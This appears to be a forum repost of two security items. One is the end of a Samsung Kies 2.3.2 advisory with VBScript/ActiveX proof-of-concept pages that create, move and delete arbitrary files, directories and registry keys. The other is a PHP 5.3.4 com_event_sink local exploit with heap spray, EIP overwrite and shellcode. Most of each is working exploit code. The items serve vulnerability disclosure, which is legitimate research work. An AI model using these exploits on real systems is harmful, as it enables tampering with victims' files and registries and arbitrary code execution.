Sub daPoC2() daTarget.FileMoveSync daFileCopyDest, daFileMoveDest End Sub Sub daPoC3() daTarget.FileDelete daFileMoveDest End Sub </script> <body> <h3>Multiple vulnerabilities in Samsung Kies v.2.3.2.12054_20</h3> <h4>Arbitrary File Modification PoC</h4> <hr> This simple PoC will copy your <script language='vbscript'>document.write(daFileCopySource)</script> file into your desktop.<BR><BR> <input language=VBScript onclick=daPoC() type=button value="Proof of Concept"> <hr> This simple PoC will move your <script language='vbscript'>document.write(daFileCopyDest)</script> file into <script language='vbscript'>document.write(daFileMoveDest)</script>.<BR><BR> <input language=VBScript onclick=daPoC2() type=button value="Proof of Concept"> <hr> This simple PoC will delete <script language='vbscript'>document.write(daFileMoveDest)</script>.<BR><BR> <input language=VBScript onclick=daPoC3() type=button value="Proof of Concept"> </body> <object classid='clsid:C668B648-A2BD-432C-854F-C8C0A275E1F1' id='daTarget'></object> </html> 4) Arbitrary Directory Modification in Samsung Kies: CVE-2012-3809 The CmdAgent.dll library, located by default in "C:\Program Files (x86)\Samsung\Kies\External\FirmwareUpdate\", has numerous arbitrary directory modification vulnerabilities present in "CmdAgentLib" (GUID: {1FA56F8D-A66E-4ABD-9BC9-6F61469E59AD}), in particular in the 'ICommandAgent' interface of the "CommandAgent" class (GUID: {C668B648-A2BD-432C-854F-C8C0A275E1F1}). This default "ICommandAgent" interface has multiple functions and methods, and most of them can be leveraged by an untrusted source. Arbitrary Directory Modification: DirCreate => Vulnerable DirDelete => Vulnerable Arbitrary Directory Modification Proof of Concept: <html> <!-- (c)oded by Frederic Bourla, High-Tech Bridge --> <head> <title>Multiple vulnerabilities in Samsung Kies v.2.3.2.12054_20</title> </head> <script language='vbscript'> Set daShell = CreateObject( "WScript.Shell" ) daProfile=daShell.ExpandEnvironmentStrings("%USERPROFILE%") daDir=daprofile & "\Desktop\FRoGito" Sub daPoC() daTarget.DirCreate daDir End Sub Sub daPoC2() daTarget.DirDelete daDir End Sub </script> <body> <h3>Multiple vulnerabilities in Samsung Kies v.2.3.2.12054_20</h3> <h4>Arbitrary Directory Modification PoC</h4> <hr> This simple PoC will create the <script language='vbscript'>document.write(daDir)</script> directory.<BR><BR> <input language=VBScript onclick=daPoC() type=button value="Proof of Concept"> <hr> This simple PoC will delete the <script language='vbscript'>document.write(daDir)</script> directory.<BR><BR> <input language=VBScript onclick=daPoC2() type=button value="Proof of Concept"> </body> <object classid='clsid:C668B648-A2BD-432C-854F-C8C0A275E1F1' id='daTarget'></object> </html> 5) Arbitrary Registry Modification in Samsung Kies: CVE-2012-3810 The CmdAgent.dll library, located by default in "C:\Program Files (x86)\Samsung\Kies\External\FirmwareUpdate\", has numerous Registry modification vulnerabilities present in "CmdAgentLib" (GUID: {1FA56F8D-A66E-4ABD-9BC9-6F61469E59AD}), in particular in the 'ICommandAgent' interface of the "CommandAgent" class (GUID: {C668B648-A2BD-432C-854F-C8C0A275E1F1}). This default "ICommandAgent" interface has multiple functions and methods, and most of them can be leveraged by an untrusted source. Arbitrary Registry Modification: RegiCreateKey => Vulnerable RegiDeleteKey => Vulnerable RegiDeleteTree => Vulnerable RegiDeleteValue => Vulnerable RegiSetValueInt => Vulnerable RegiSetValueInt64 => Vulnerable RegiSetValueString => Vulnerable RegiSetValueString64 => Vulnerable Arbitrary Registry Modification Proof of Concept: <html> <!-- (c)oded by Frederic Bourla, High-Tech Bridge --> <head> <title>Multiple vulnerabilities in Samsung Kies v.2.3.2.12054_20</title> </head> <script language="vbscript"> daReg = "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\FRoGito" daValueStrName = "PoC_str" daValueStr = "frederic.bourla@htbridge.com" daValueIntName = "PoC_int" daValueInt = 8080 Sub daPoC() daTarget.RegiCreateKey daReg End Sub Sub daPoC2() daTarget.RegiSetValueString daReg, daValueStrName, daValueStr End Sub Sub daPoC3() daTarget.RegiSetValueInt daReg, daValueIntName, daValueInt End Sub Sub daPoC4() daTarget.RegiDeleteValue daReg, daValueStrName daTarget.RegiDeleteValue daReg, daValueIntName End Sub Sub daPoC5() daTarget.RegiDeleteKey daReg End Sub </script> <body> <h3>Multiple vulnerabilities in Samsung Kies v.2.3.2.12054_20</h3> <h4>Arbitrary Registry Modification PoC</h4> <hr> This simple PoC will create the HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\FRoGito registry key.<BR><BR> <input language=VBScript onclick=daPoC() type=button value="Proof of Concept"> <hr> This simple PoC will create the string value 'PoC_str' initialized to 'frederic.bourla@htbridge.com' in the HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\FRoGitoregistry key.<BR><BR> <input language=VBScript onclick=daPoC2() type=button value="Proof of Concept"> <hr> This simple PoC will create the int value 'PoC_int' initialized to 0x1F90 in the HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\FRoGito registry key. <BR><BR> <input language=VBScript onclick=daPoC3() type=button value="Proof of Concept"> <hr> This simple PoC will delete both string and hex values from the HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\FRoGito registry key <BR><BR> <input language=VBScript onclick=daPoC4() type=button value="Proof of Concept"> <hr> This simple PoC will delete the HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\FRoGito registry key. <BR><BR> <input language=VBScript onclick=daPoC5() type=button value="Proof of Concept"> </body> <object classid='clsid:C668B648-A2BD-432C-854F-C8C0A275E1F1' id='daTarget'></object> </html> Solution: Upgrade to KIES v2.5.0.12094_27_11 ----------------------------------------------------------------------------------------------- References: [1] High-Tech Bridge Advisory HTB23099 - https://www.htbridge.com/advisory/HTB23099 - Multiple vulnerabilities in Samsung Kies. [2] Samsung Kies - Kies Samsung - Samsung Kies is a freeware software application used to communicate between Windows or Macintosh computers, and more recently-manufactured Samsung mobile phone and tablet computer devices. Kies is Samsung's official tool for Android based devices which allows synchronization and multimedia files management. [3] Common Vulnerabilities and Exposures (CVE) - CVE - Common Vulnerabilities and Exposures (CVE) - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures. [4] Common Weakness Enumeration (CWE) - CWE - Common Weakness Enumeration - targeted to developers and security practitioners, CWE is a formal list of software weakness types. Sursa Samsung Kies 2.3.2.12054_20 Multiple Vulnerabilities

PHP 5.3.4 Win Com Module Com_sink Exploit # Exploit Title: PHP 5.3.4 Win Com Module Com_sink Local Exploit # Google Dork: Nil # Date: 9/10/2012 # Author: FB1H2S # Software Link: PHP Windows # Version: [5.3.4] # Tested on: Microsoft XP Pro 2002 SP2 <?php //PHP 5.3.4 // //$eip ="\x44\x43\x42\x41"; $eip= "\x4b\xe8\x57\x78"; $eax ="\x80\x01\x8d\x04"; $deodrant=""; $axespray = str_repeat($eip.$eax,0x80); //048d0190 echo strlen($axespray); echo "PHP 5.3.4 WIN Com Module COM_SINK 0-day\n" ; echo "By Rahul Sasi : http://twitter.com/fb1h2s\n" ; echo "Exploit Tested on:\n Microsoft XP Pro 2002 SP2 \n" ; echo "More Details Here:\n http://www.garage4hackers.com/blogs/8/web-app-remote-code-execution-via-scripting-engines-part-1-local-exploits-php-0-day-394/\n" ; //19200 ==4B32 4b00 for($axeeffect=0;$axeeffect<0x4B32;$axeeffect++) { $deodrant.=$axespray; } $terminate = "T"; $u[] =$deodrant; $r[] =$deodrant.$terminate; $a[] =$deodrant.$terminate; $s[] =$deodrant.$terminate; //$vVar = new VARIANT(0x048d0038+$offset); // This is what we controll $vVar = new VARIANT(0x048d0000+180); //alert box Shellcode $buffer = "\x90\x90\x90". "\xB9\x38\xDD\x82\x7C\x33\xC0\xBB". "\xD8\x0A\x86\x7C\x51\x50\xFF\xd3"; $var2 = new VARIANT(0x41414242); com_event_sink($vVar,$var2,$buffer); ?> Sursa http://www.bugsearch.net/en/13728/php-534-win-com-module-comsink-exploit.html